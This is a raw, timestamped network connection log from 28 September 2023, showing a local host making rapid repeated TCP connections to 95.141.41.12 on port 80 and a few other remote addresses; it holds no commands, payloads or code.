                                                                                              Sep 28, 2023 06:04:01.566904068 CEST805017595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.567002058 CEST5017580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.671412945 CEST5017580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.672292948 CEST5017680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.866292953 CEST805017695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.866483927 CEST5017680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.866714001 CEST5017680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:01.868649960 CEST805017595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:01.868870020 CEST5017580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.060708046 CEST805017695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.064965963 CEST805017695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.065043926 CEST5017680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.170100927 CEST5017680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.170547009 CEST5017780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.359092951 CEST805017795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.359175920 CEST5017780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.359369993 CEST5017780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.363878965 CEST805017695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.364068031 CEST5017680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.547713995 CEST805017795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.549529076 CEST805017795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.549699068 CEST5017780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.654572964 CEST5017780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.654983997 CEST5017880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.844137907 CEST805017795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.844338894 CEST5017780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.852626085 CEST805017895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:02.852731943 CEST5017880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:02.852933884 CEST5017880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.050304890 CEST805017895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.054897070 CEST805017895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.055283070 CEST5017880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.170402050 CEST5017880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.170929909 CEST5017980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.362420082 CEST805017995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.362654924 CEST5017980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.362761974 CEST5017980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.369065046 CEST805017895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.369143009 CEST5017880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.554152966 CEST805017995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.556583881 CEST805017995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.556653023 CEST5017980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.673136950 CEST5017980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.673360109 CEST5018180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.864548922 CEST805017995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.864763021 CEST5017980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.871087074 CEST805018195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:03.871320009 CEST5018180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:03.871680975 CEST5018180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.069953918 CEST805018195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.071501970 CEST805018195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.071578979 CEST5018180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.185381889 CEST5018180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.185868979 CEST5018280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.375555038 CEST805018295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.375777960 CEST5018280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.375866890 CEST5018280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.383374929 CEST805018195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.383574963 CEST5018180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.565928936 CEST805018295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.570189953 CEST805018295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.570305109 CEST5018280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.685523033 CEST5018280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.685945988 CEST5018380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.875679016 CEST805018295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.876080990 CEST5018280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.882846117 CEST805018395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:04.882920027 CEST5018380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:04.883121014 CEST5018380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.080085993 CEST805018395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.082016945 CEST805018395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.082078934 CEST5018380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.185321093 CEST5018380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.185549974 CEST5018580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.370138884 CEST805018595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.370220900 CEST5018580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.370465040 CEST5018580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.382092953 CEST805018395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.382153988 CEST5018380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.554837942 CEST805018595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.560642958 CEST805018595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.560827971 CEST5018580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.669725895 CEST5018580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.670099020 CEST5018680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.840183020 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:04:05.854346037 CEST805018595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.854634047 CEST5018580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.857013941 CEST805018695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:05.857105970 CEST5018680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:05.857310057 CEST5018680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.044464111 CEST805018695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.049202919 CEST805018695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.049549103 CEST5018680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.154361010 CEST5018680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.154833078 CEST5018780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.341701031 CEST805018695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.341799021 CEST5018680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.359707117 CEST805018795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.359822035 CEST5018780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.360048056 CEST5018780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.564450979 CEST805018795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.566963911 CEST805018795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.567239046 CEST5018780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.669852972 CEST5018780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.670233965 CEST5018980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.862185955 CEST805018995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.862464905 CEST5018980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.862617016 CEST5018980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:06.875132084 CEST805018795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:06.875232935 CEST5018780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.054182053 CEST805018995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.061086893 CEST805018995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.061247110 CEST5018980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.170161963 CEST5018980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.170613050 CEST5019080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.361974001 CEST805018995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.362148046 CEST5018980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.370421886 CEST805019095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.370532036 CEST5019080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.370757103 CEST5019080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.570642948 CEST805019095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.574594021 CEST805019095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.574927092 CEST5019080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.686028957 CEST5019080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.686378956 CEST5019180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.886331081 CEST805019095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.886652946 CEST5019080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.886842012 CEST805019195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:07.887155056 CEST5019180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:07.887155056 CEST5019180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.088615894 CEST805019195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.092694044 CEST805019195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.092864037 CEST5019180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.201101065 CEST5019180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.201314926 CEST5019380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.395462036 CEST805019395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.395698071 CEST5019380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.395768881 CEST5019380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.401747942 CEST805019195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.402018070 CEST5019180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.589993954 CEST805019395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.595077991 CEST805019395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.595144987 CEST5019380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.700851917 CEST5019380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.701188087 CEST5019480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.894983053 CEST805019495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.895047903 CEST805019395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:08.895082951 CEST5019480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.895106077 CEST5019380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:08.895266056 CEST5019480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.090073109 CEST805019495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.094784975 CEST805019495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.095043898 CEST5019480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.205604076 CEST5019480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.206207991 CEST5019580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.397408009 CEST805019595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.397715092 CEST5019580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.397916079 CEST5019580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.399277925 CEST805019495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.399481058 CEST5019480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.589179993 CEST805019595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.593874931 CEST805019595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.594034910 CEST5019580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.701083899 CEST5019580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.723695993 CEST5019680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.892390013 CEST805019595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.892570972 CEST5019580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.910764933 CEST805019695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:09.910932064 CEST5019680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:09.912652016 CEST5019680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.099581957 CEST805019695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.104485989 CEST805019695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.104559898 CEST5019680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.216829062 CEST5019680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.217505932 CEST5019880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.404158115 CEST805019695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.404448032 CEST5019680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.417849064 CEST805019895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.418159008 CEST5019880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.418736935 CEST5019880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.619066954 CEST805019895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.623270988 CEST805019895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.623439074 CEST5019880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.732398033 CEST5019880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.734813929 CEST5019980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.925585032 CEST805019995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.925775051 CEST5019980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.926029921 CEST5019980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:10.932619095 CEST805019895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:10.932769060 CEST5019880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.116749048 CEST805019995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.125277996 CEST805019995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.125371933 CEST5019980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.233217001 CEST5019980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.233658075 CEST5020080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.424685001 CEST805020095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.424861908 CEST5020080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.425164938 CEST5020080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.429327965 CEST805019995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.429580927 CEST5019980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.612402916 CEST805020095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.618504047 CEST805020095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.618571043 CEST5020080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.732223034 CEST5020080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.732637882 CEST5020380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.919272900 CEST805020095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.919389963 CEST5020080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.919992924 CEST805020395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:11.920079947 CEST5020380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:11.920277119 CEST5020380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.108189106 CEST805020395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.113439083 CEST805020395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.113610029 CEST5020380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.217004061 CEST5020380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.217436075 CEST5020480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.405096054 CEST805020395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.405397892 CEST5020380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.415908098 CEST805020495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.416109085 CEST5020480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.416254044 CEST5020480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.615087986 CEST805020495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.620618105 CEST805020495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.620697021 CEST5020480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.732394934 CEST5020480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.732858896 CEST5020580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.930052042 CEST805020595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.930263996 CEST5020580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.930352926 CEST5020580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:12.931041002 CEST805020495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:12.931118965 CEST5020480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.127703905 CEST805020595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.132760048 CEST805020595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.133037090 CEST5020580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.247777939 CEST5020580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.248172998 CEST5020780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.445422888 CEST805020595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.445612907 CEST5020580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.447691917 CEST805020795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.447803020 CEST5020780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.448112011 CEST5020780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.648614883 CEST805020795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.652796030 CEST805020795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.652998924 CEST5020780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.763745070 CEST5020780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.763999939 CEST5020880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.902606964 CEST4980580192.168.2.3178.237.33.50
                                                                                              Sep 28, 2023 06:04:13.957241058 CEST805020895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.957367897 CEST5020880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.957611084 CEST5020880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:13.963689089 CEST805020795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:13.963778973 CEST5020780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.150799990 CEST805020895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.155374050 CEST805020895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.155445099 CEST5020880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.263628006 CEST5020880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.263959885 CEST5020980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.448359013 CEST805020995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.448528051 CEST5020980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.448668957 CEST5020980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.457179070 CEST805020895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.457285881 CEST5020880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.633018017 CEST805020995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.638396025 CEST805020995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.638633013 CEST5020980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.763964891 CEST5020980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.764383078 CEST5021180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.948617935 CEST805020995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.948892117 CEST5020980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.965270042 CEST805021195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:14.965493917 CEST5021180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:14.965764046 CEST5021180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:15.166915894 CEST805021195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:15.171539068 CEST805021195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:15.171736002 CEST5021180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:15.396348000 CEST5021180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:15.396800995 CEST5021280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:15.594005108 CEST805021295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:15.594295979 CEST5021280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:15.596726894 CEST805021195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:15.596797943 CEST5021180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:15.818356991 CEST5021280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.016526937 CEST805021295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.020683050 CEST805021295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.020931005 CEST5021280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.138478994 CEST5021280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.138772964 CEST5021380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.326598883 CEST805021395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.326857090 CEST5021380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.326941967 CEST5021380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.336090088 CEST805021295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.336366892 CEST5021280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.514884949 CEST805021395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.518918037 CEST805021395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.519217968 CEST5021380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.550944090 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.552249908 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:04:16.623050928 CEST5021380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.623370886 CEST5021580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.762706995 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.811439991 CEST805021395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.811836004 CEST5021380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.821492910 CEST805021595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:16.821588993 CEST5021580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:16.821856022 CEST5021580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.020046949 CEST805021595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.024460077 CEST805021595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.024626017 CEST5021580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.138869047 CEST5021580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.139367104 CEST5021680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.336014986 CEST805021695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.336256981 CEST5021680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.336395979 CEST5021680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.337040901 CEST805021595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.337111950 CEST5021580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.532864094 CEST805021695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.537487030 CEST805021695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.537579060 CEST5021680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.654397964 CEST5021680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.654865026 CEST5021780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.851428032 CEST805021695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.851632118 CEST5021680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.859918118 CEST805021795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:17.859993935 CEST5021780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:17.860210896 CEST5021780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.065426111 CEST805021795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.066660881 CEST805021795.141.41.12192.168.2.3
